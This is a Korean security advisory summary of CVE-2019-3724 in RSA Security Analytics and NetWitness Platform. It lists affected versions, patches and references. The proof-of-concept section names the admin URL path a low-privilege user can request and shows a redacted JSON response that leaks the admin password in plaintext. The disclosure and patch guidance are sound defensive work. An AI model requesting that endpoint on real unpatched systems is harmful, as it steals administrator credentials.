요약

- 취약점 : 낮은 권한으로 로그인한 원격 공격자는 평문 비밀번호를 포함한 관리자 정보를 획득 할 수 있음 

- 선행 조건 : Role Analyst와 같은 낮은 권한으로 로그인 필요

- 영향 받는 제품 : 

RSA Security Analytics 버전 10 : 10.6.6.0 이하 제품

RSA NetWitness Platform 버전 11 : 11.2.1.0 이하 제품 

- 대응방안 : 

RSA Security Analytics 버전 10 : 10.6.6.1 로 패치 

RSA NetWitness Platform 버전 11 : 11.2.1.1 로 패치 


관련 CVE정보

- CVE-2019-3724

- CVSS Base Score : 6.5

- PoC : https://seclists.org/fulldisclosure/2019/May/27

(1) Role Analyst와 같은 낮은 권한으로 로그인 후 URL(https://[host]/admin/system/whois/properties) 을 호출해 관리자 리소스에 접근 

(2) 위 URL에 접근하게 되면, 서버는 평문 비밀번호를 포함한 아래의 HTTP 응답값 반환 

HTTP/1.1 200 OK

Server: nginx

Date: [snip]

Content-Type: application/json;charset=UTF-8

Connection: close

X-Frame-Options: SAMEORIGIN

Cache-Control: no-cache, no-store, max-age=0, must-revalidate

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

X-Content-Type-Options: nosniff

Strict-Transport-Security: max-age=31536000 ; includeSubDomains

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Set-Cookie: [snip]

Content-Length: 795


{""success"":true,""data"":{""queryUrl"":""https://[snip]"",""authUrl"":""https://[snip]"",""userId"":""[snip]"",""pw"":""[snip]"",""allowedRequests"":100,""allowedRequestsInterval"":60,""queueMaxSize"":100000,""cacheMaxSize"":50000,""refreshInterval"":30,""waitForHttpRequests"":true,""settings"":{""query-url"":""https://[snip]"",""queue-max-size"":100000,""password"":""[snip]"",""allowed-requests"":100,""auth-url"":""https://[snip]"",""user-id"":""[snip]"",""refresh-interval-seconds"":{""seconds"":2592000,""milliSeconds"":2592000000},""cache-max-size"":50000,""wait-for-http-request"":true,""allowed-requests-interval-seconds"":{""seconds"":60,""milliSeconds"":60000}}}}


영향성

해당 버전 사용 그룹사는 신속한 패치 필요 


참고자료

출처 : https://community.rsa.com/docs/DOC-104202

  https://www.securityfocus.com/bid/108357

+ Recent posts